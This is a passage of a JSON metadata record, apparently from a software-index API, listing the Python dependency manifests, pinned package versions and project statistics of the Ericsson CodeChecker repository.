nd":"development","optional":false},{"id":13878388893,"package_name":"pylint","ecosystem":"pypi","requirements":"==2.8.2","direct":true,"kind":"development","optional":false}]},{"ecosystem":"pypi","filepath":"analyzer/tools/merge_clang_extdef_mappings/requirements_py/dev/requirements.txt","sha":null,"kind":"manifest","created_at":"2023-09-22T16:47:18.902Z","updated_at":"2023-09-22T16:47:18.902Z","repository_link":"https://github.com/Ericsson/codechecker/blob/master/analyzer/tools/merge_clang_extdef_mappings/requirements_py/dev/requirements.txt","dependencies":[{"id":13878388911,"package_name":"pytest","ecosystem":"pypi","requirements":"==7.3.1","direct":true,"kind":"development","optional":false},{"id":13878388912,"package_name":"pycodestyle","ecosystem":"pypi","requirements":"==2.4.0","direct":true,"kind":"development","optional":false},{"id":13878388913,"package_name":"pylint","ecosystem":"pypi","requirements":"==2.8.2","direct":true,"kind":"development","optional":false}]},{"ecosystem":"pypi","filepath":"analyzer/tools/merge_clang_extdef_mappings/setup.py","sha":null,"kind":"manifest","created_at":"2023-09-22T16:47:21.806Z","updated_at":"2023-09-22T16:47:21.806Z","repository_link":"https://github.com/Ericsson/codechecker/blob/master/analyzer/tools/merge_clang_extdef_mappings/setup.py","dependencies":[]},{"ecosystem":"pypi","filepath":"analyzer/tools/statistics_collector/requirements_py/dev/requirements.txt","sha":null,"kind":"manifest","created_at":"2023-09-22T16:47:23.108Z","updated_at":"2023-09-22T16:47:23.108Z","repository_link":"https://github.com/Ericsson/codechecker/blob/master/analyzer/tools/statistics_collector/requirements_py/dev/requirements.txt","dependencies":[{"id":13878388980,"package_name":"pytest","ecosystem":"pypi","requirements":"==7.3.1","direct":true,"kind":"development","optional":false},{"id":13878388981,"package_name":"pycodestyle","ecosystem":"pypi","requirements":"==2.4.0","direct":true,"kind":"development","optional":false},{"id":13878388982,"package_name":"pylint","ecosystem":"pypi","requirements":"==2.8.2","direct":true,"kind":"development","optional":false}]},{"ecosystem":"pypi","filepath":"analyzer/tools/statistics_collector/setup.py","sha":null,"kind":"manifest","created_at":"2023-09-22T16:47:24.018Z","updated_at":"2023-09-22T16:47:24.018Z","repository_link":"https://github.com/Ericsson/codechecker/blob/master/analyzer/tools/statistics_collector/setup.py","dependencies":[]},{"ecosystem":"pypi","filepath":"codechecker_common/requirements_py/dev/requirements.txt","sha":null,"kind":"manifest","created_at":"2023-09-22T16:47:25.310Z","updated_at":"2023-09-22T16:47:25.310Z","repository_link":"https://github.com/Ericsson/codechecker/blob/master/codechecker_common/requirements_py/dev/requirements.txt","dependencies":[{"id":13878389196,"package_name":"portalocker","ecosystem":"pypi","requirements":"==2.2.1","direct":true,"kind":"development","optional":false},{"id":13878389197,"package_name":"coverage","ecosystem":"pypi","requirements":"==5.5.0","direct":true,"kind":"development","optional":false},{"id":13878389198,"package_name":"mypy","ecosystem":"pypi","requirements":"==0.812","direct":true,"kind":"development","optional":false},{"id":13878389199,"package_name":"mypy_extensions","ecosystem":"pypi","requirements":"==0.4.3","direct":true,"kind":"development","optional":false},{"id":13878389200,"package_name":"PyYAML","ecosystem":"pypi","requirements":"==6.0.1","direct":true,"kind":"development","optional":false}]},{"ecosystem":"pypi","filepath":"requirements_py/docs/requirements.txt","sha":null,"kind":"manifest","created_at":"2023-09-22T16:47:27.015Z","updated_at":"2023-09-22T16:47:27.015Z","repository_link":"https://github.com/Ericsson/codechecker/blob/master/requirements_py/docs/requirements.txt","dependencies":[{"id":13878389222,"package_name":"mkdocs","ecosystem":"pypi","requirements":"==1.2.3","direct":true,"kind":"runtime","optional":false}]},{"ecosystem":"pypi","filepath":"setup.py","sha":null,"kind":"manifest","created_at":"2023-09-22T16:47:28.219Z","updated_at":"2023-09-22T16:47:28.219Z","repository_link":"https://github.com/Ericsson/codechecker/blob/master/setup.py","dependencies":[]},{"ecosystem":"pypi","filepath":"tools/bazel/requirements_py/dev/requirements.txt","sha":null,"kind":"manifest","created_at":"2023-09-22T16:47:29.119Z","updated_at":"2023-09-22T16:47:29.119Z","repository_link":"https://github.com/Ericsson/codechecker/blob/master/tools/bazel/requirements_py/dev/requirements.txt","dependencies":[{"id":13878389268,"package_name":"pytest","ecosystem":"pypi","requirements":"==7.3.1","direct":true,"kind":"development","optional":false},{"id":13878389269,"package_name":"pycodestyle","ecosystem":"pypi","requirements":"==2.7.0","direct":true,"kind":"development","optional":false},{"id":13878389270,"package_name":"pylint","ecosystem":"pypi","requirements":"==2.8.2","direct":true,"kind":"development","optional":false},{"id":13878389271,"package_name":"mypy","ecosystem":"pypi","requirements":"==0.812","direct":true,"kind":"development","optional":false},{"id":13878389272,"package_name":"mypy_extensions","ecosystem":"pypi","requirements":"==0.4.3","direct":true,"kind":"development","optional":false}]},{"ecosystem":"pypi","filepath":"tools/bazel/setup.py","sha":null,"kind":"manifest","created_at":"2023-09-22T16:47:31.122Z","updated_at":"2023-09-22T16:47:31.122Z","repository_link":"https://github.com/Ericsson/codechecker/blob/master/tools/bazel/setup.py","dependencies":[]},{"ecosystem":"pypi","filepath":"tools/report-converter/requirements_py/dev/requirements.txt","sha":null,"kind":"manifest","created_at":"2023-09-22T16:47:32.327Z","updated_at":"2023-09-22T16:47:32.327Z","repository_link":"https://github.com/Ericsson/codechecker/blob/master/tools/report-converter/requirements_py/dev/requirements.txt","dependencies":[{"id":13878389277,"package_name":"pytest","ecosystem":"pypi","requirements":"==7.3.1","direct":true,"kind":"development","optional":false},{"id":13878389278,"package_name":"pycodestyle","ecosystem":"pypi","requirements":"==2.7.0","direct":true,"kind":"development","optional":false},{"id":13878389279,"package_name":"pylint","ecosystem":"pypi","requirements":"==2.8.2","direct":true,"kind":"development","optional":false},{"id":13878389280,"package_name":"portalocker","ecosystem":"pypi","requirements":"==2.2.1","direct":true,"kind":"development","optional":false},{"id":13878389281,"package_name":"mypy","ecosystem":"pypi","requirements":"==0.812","direct":true,"kind":"development","optional":false},{"id":13878389282,"package_name":"mypy_extensions","ecosystem":"pypi","requirements":"==0.4.3","direct":true,"kind":"development","optional":false}]},{"ecosystem":"pypi","filepath":"tools/report-converter/setup.py","sha":null,"kind":"manifest","created_at":"2023-09-22T16:47:33.728Z","updated_at":"2023-09-22T16:47:33.728Z","repository_link":"https://github.com/Ericsson/codechecker/blob/master/tools/report-converter/setup.py","dependencies":[]},{"ecosystem":"pypi","filepath":"tools/tu_collector/requirements_py/dev/requirements.txt","sha":null,"kind":"manifest","created_at":"2023-09-22T16:47:44.537Z","updated_at":"2023-09-22T16:47:44.537Z","repository_link":"https://github.com/Ericsson/codechecker/blob/master/tools/tu_collector/requirements_py/dev/requirements.txt","dependencies":[{"id":13878390064,"package_name":"pytest","ecosystem":"pypi","requirements":"==7.3.1","direct":true,"kind":"development","optional":false},{"id":13878390065,"package_name":"pycodestyle","ecosystem":"pypi","requirements":"==2.7.0","direct":true,"kind":"development","optional":false},{"id":13878390066,"package_name":"pylint","ecosystem":"pypi","requirements":"==2.8.2","direct":true,"kind":"development","optional":false},{"id":13878390067,"package_name":"mypy","ecosystem":"pypi","requirements":"==0.812","direct":true,"kind":"development","optional":false},{"id":13878390068,"package_name":"mypy_extensions","ecosystem":"pypi","requirements":"==0.4.3","direct":true,"kind":"development","optional":false}]},{"ecosystem":"pypi","filepath":"tools/tu_collector/setup.py","sha":null,"kind":"manifest","created_at":"2023-09-22T16:47:45.642Z","updated_at":"2023-09-22T16:47:45.642Z","repository_link":"https://github.com/Ericsson/codechecker/blob/master/tools/tu_collector/setup.py","dependencies":[]},{"ecosystem":"pypi","filepath":"web/api/py/codechecker_api/setup.py","sha":null,"kind":"manifest","created_at":"2023-09-22T16:47:46.342Z","updated_at":"2023-09-22T16:47:46.342Z","repository_link":"https://github.com/Ericsson/codechecker/blob/master/web/api/py/codechecker_api/setup.py","dependencies":[{"id":13878390134,"package_name":"thrift","ecosystem":"pypi","requirements":"==0.13.0","direct":true,"kind":"runtime","optional":false}]},{"ecosystem":"pypi","filepath":"web/api/py/codechecker_api_shared/setup.py","sha":null,"kind":"manifest","created_at":"2023-09-22T16:47:47.546Z","updated_at":"2023-09-22T16:47:47.546Z","repository_link":"https://github.com/Ericsson/codechecker/blob/master/web/api/py/codechecker_api_shared/setup.py","dependencies":[]},{"ecosystem":"pypi","filepath":"web/requirements.txt","sha":null,"kind":"manifest","created_at":"2023-09-22T16:47:48.660Z","updated_at":"2023-09-22T16:47:48.660Z","repository_link":"https://github.com/Ericsson/codechecker/blob/master/web/requirements.txt","dependencies":[{"id":13878390751,"package_name":"lxml","ecosystem":"pypi","requirements":"==4.9.2","direct":true,"kind":"runtime","optional":false},{"id":13878390752,"package_name":"sqlalchemy","ecosystem":"pypi","requirements":"==1.3.23","direct":true,"kind":"runtime","optional":false},{"id":13878390753,"package_name":"alembic","ecosystem":"pypi","requirements":"==1.5.5","direct":true,"kind":"runtime","optional":false},{"id":13878390754,"package_name":"portalocker","ecosystem":"pypi","requirements":"==2.2.1","direct":true,"kind":"runtime","optional":false},{"id":13878390755,"package_name":"psutil","ecosystem":"pypi","requirements":"==5.8.0","direct":true,"kind":"runtime","optional":false},{"id":13878390756,"package_name":"mypy_extensions","ecosystem":"pypi","requirements":"==0.4.3","direct":true,"kind":"runtime","optional":false},{"id":13878390757,"package_name":"thrift","ecosystem":"pypi","requirements":"==0.13.0","direct":true,"kind":"runtime","optional":false},{"id":13878390758,"package_name":"gitpython","ecosystem":"pypi","requirements":"==3.1.34","direct":true,"kind":"runtime","optional":false},{"id":13878390759,"package_name":"PyYAML","ecosystem":"pypi","requirements":"==6.0.1","direct":true,"kind":"runtime","optional":false}]},{"ecosystem":"pypi","filepath":"web/requirements_py/auth/requirements.txt","sha":null,"kind":"manifest","created_at":"2023-09-22T16:47:50.055Z","updated_at":"2023-09-22T16:47:50.055Z","repository_link":"https://github.com/Ericsson/codechecker/blob/master/web/requirements_py/auth/requirements.txt","dependencies":[{"id":13878390867,"package_name":"python-ldap","ecosystem":"pypi","requirements":"==3.4.0","direct":true,"kind":"runtime","optional":false},{"id":13878390868,"package_name":"python-pam","ecosystem":"pypi","requirements":"==1.8.4","direct":true,"kind":"runtime","optional":false}]},{"ecosystem":"pypi","filepath":"web/requirements_py/db_pg8000/requirements.txt","sha":null,"kind":"manifest","created_at":"2023-09-22T16:47:51.181Z","updated_at":"2023-09-22T16:47:51.181Z","repository_link":"https://github.com/Ericsson/codechecker/blob/master/web/requirements_py/db_pg8000/requirements.txt","dependencies":[{"id":13878390875,"package_name":"lxml","ecosystem":"pypi","requirements":"==4.9.2","direct":true,"kind":"runtime","optional":false},{"id":13878390876,"package_name":"sqlalchemy","ecosystem":"pypi","requirements":"==1.3.23","direct":true,"kind":"runtime","optional":false},{"id":13878390877,"package_name":"alembic","ecosystem":"pypi","requirements":"==1.5.5","direct":true,"kind":"runtime","optional":false},{"id":13878390878,"package_name":"pg8000","ecosystem":"pypi","requirements":"==1.15.2","direct":true,"kind":"runtime","optional":false},{"id":13878390879,"package_name":"psutil","ecosystem":"pypi","requirements":"==5.8.0","direct":true,"kind":"runtime","optional":false},{"id":13878390880,"package_name":"portalocker","ecosystem":"pypi","requirements":"==2.2.1","direct":true,"kind":"runtime","optional":false}]},{"ecosystem":"pypi","filepath":"web/requirements_py/db_psycopg2/requirements.txt","sha":null,"kind":"manifest","created_at":"2023-09-22T16:47:52.482Z","updated_at":"2023-09-22T16:47:52.482Z","repository_link":"https://github.com/Ericsson/codechecker/blob/master/web/requirements_py/db_psycopg2/requirements.txt","dependencies":[{"id":13878391110,"package_name":"lxml","ecosystem":"pypi","requirements":"==4.9.2","direct":true,"kind":"runtime","optional":false},{"id":13878391111,"package_name":"sqlalchemy","ecosystem":"pypi","requirements":"==1.3.23","direct":true,"kind":"runtime","optional":false},{"id":13878391112,"package_name":"alembic","ecosystem":"pypi","requirements":"==1.5.5","direct":true,"kind":"runtime","optional":false},{"id":13878391113,"package_name":"psycopg2-binary","ecosystem":"pypi","requirements":"==2.8.6","direct":true,"kind":"runtime","optional":false},{"id":13878391114,"package_name":"psutil","ecosystem":"pypi","requirements":"==5.8.0","direct":true,"kind":"runtime","optional":false},{"id":13878391115,"package_name":"portalocker","ecosystem":"pypi","requirements":"==2.2.1","direct":true,"kind":"runtime","optional":false}]},{"ecosystem":"pypi","filepath":"web/requirements_py/dev/requirements.txt","sha":null,"kind":"manifest","created_at":"2023-09-22T16:47:54.386Z","updated_at":"2023-09-22T16:47:54.386Z","repository_link":"https://github.com/Ericsson/codechecker/blob/master/web/requirements_py/dev/requirements.txt","dependencies":[{"id":13878391123,"package_name":"lxml","ecosystem":"pypi","requirements":"==4.9.2","direct":true,"kind":"development","optional":false},{"id":13878391124,"package_name":"sqlalchemy","ecosystem":"pypi","requirements":"==1.3.23","direct":true,"kind":"development","optional":false},{"id":13878391125,"package_name":"pycodestyle","ecosystem":"pypi","requirements":"==2.7.0","direct":true,"kind":"development","optional":false},{"id":13878391126,"package_name":"alembic","ecosystem":"pypi","requirements":"==1.5.5","direct":true,"kind":"development","optional":false},{"id":13878391127,"package_name":"psycopg2-binary","ecosystem":"pypi","requirements":"==2.8.6","direct":true,"kind":"development","optional":false},{"id":13878391128,"package_name":"pg8000","ecosystem":"pypi","requirements":"==1.15.2","direct":true,"kind":"development","optional":false},{"id":13878391129,"package_name":"psutil","ecosystem":"pypi","requirements":"==5.8.0","direct":true,"kind":"development","optional":false},{"id":13878391130,"package_name":"portalocker","ecosystem":"pypi","requirements":"==2.2.1","direct":true,"kind":"development","optional":false},{"id":13878391131,"package_name":"pylint","ecosystem":"pypi","requirements":"==2.8.2","direct":true,"kind":"development","optional":false},{"id":13878391132,"package_name":"pytest","ecosystem":"pypi","requirements":"==7.3.1","direct":true,"kind":"development","optional":false},{"id":13878391133,"package_name":"mkdocs","ecosystem":"pypi","requirements":"==1.2.3","direct":true,"kind":"development","optional":false},{"id":13878391134,"package_name":"mypy_extensions","ecosystem":"pypi","requirements":"==0.4.3","direct":true,"kind":"development","optional":false},{"id":13878391135,"package_name":"coverage","ecosystem":"pypi","requirements":"==5.5.0","direct":true,"kind":"development","optional":false},{"id":13878391136,"package_name":"thrift","ecosystem":"pypi","requirements":"==0.13.0","direct":true,"kind":"development","optional":false},{"id":13878391137,"package_name":"gitpython","ecosystem":"pypi","requirements":"==3.1.34","direct":true,"kind":"development","optional":false},{"id":13878391138,"package_name":"twine","ecosystem":"pypi","requirements":"*","direct":true,"kind":"development","optional":false},{"id":13878391139,"package_name":"cryptography","ecosystem":"pypi","requirements":"==41.0.4","direct":true,"kind":"development","optional":false}]},{"ecosystem":"pypi","filepath":"web/requirements_py/osx/requirements.txt","sha":null,"kind":"manifest","created_at":"2023-09-22T16:47:55.288Z","updated_at":"2023-09-22T16:47:55.288Z","repository_link":"https://github.com/Ericsson/codechecker/blob/master/web/requirements_py/osx/requirements.txt","dependencies":[{"id":13878391159,"package_name":"lxml","ecosystem":"pypi","requirements":"==4.9.2","direct":true,"kind":"runtime","optional":false},{"id":13878391160,"package_name":"alembic","ecosystem":"pypi","requirements":"==1.5.5","direct":true,"kind":"runtime","optional":false},{"id":13878391161,"package_name":"portalocker","ecosystem":"pypi","requirements":"==2.2.1","direct":true,"kind":"runtime","optional":false},{"id":13878391162,"package_name":"psutil","ecosystem":"pypi","requirements":"==5.8.0","direct":true,"kind":"runtime","optional":false},{"id":13878391163,"package_name":"sqlalchemy","ecosystem":"pypi","requirements":"==1.3.23","direct":true,"kind":"runtime","optional":false},{"id":13878391164,"package_name":"mypy_extensions","ecosystem":"pypi","requirements":"==0.4.3","direct":true,"kind":"runtime","optional":false},{"id":13878391165,"package_name":"thrift","ecosystem":"pypi","requirements":"==0.13.0","direct":true,"kind":"runtime","optional":false}]}],"score":23.0920745178989,"created_at":"2025-09-08T11:18:24.612Z","updated_at":"2025-10-07T08:24:19.249Z","avatar_url":"https://github.com/Ericsson.png","language":"Python","category":null,"sub_category":null,"monthly_downloads":27127,"funding_links":[],"readme_doi_urls":[],"works":{},"citation_counts":{},"total_citations":0,"keywords_from_contributors":["annotation","energy-system-model","energy-system","distributed","transformation","autograd","cryptocurrencies","diffusion","sequencing","charts"],"project_url":"https://science.ecosyste.ms/api/v1/projects/62270","html_url":"https://science.ecosyste.ms/projects/62270"}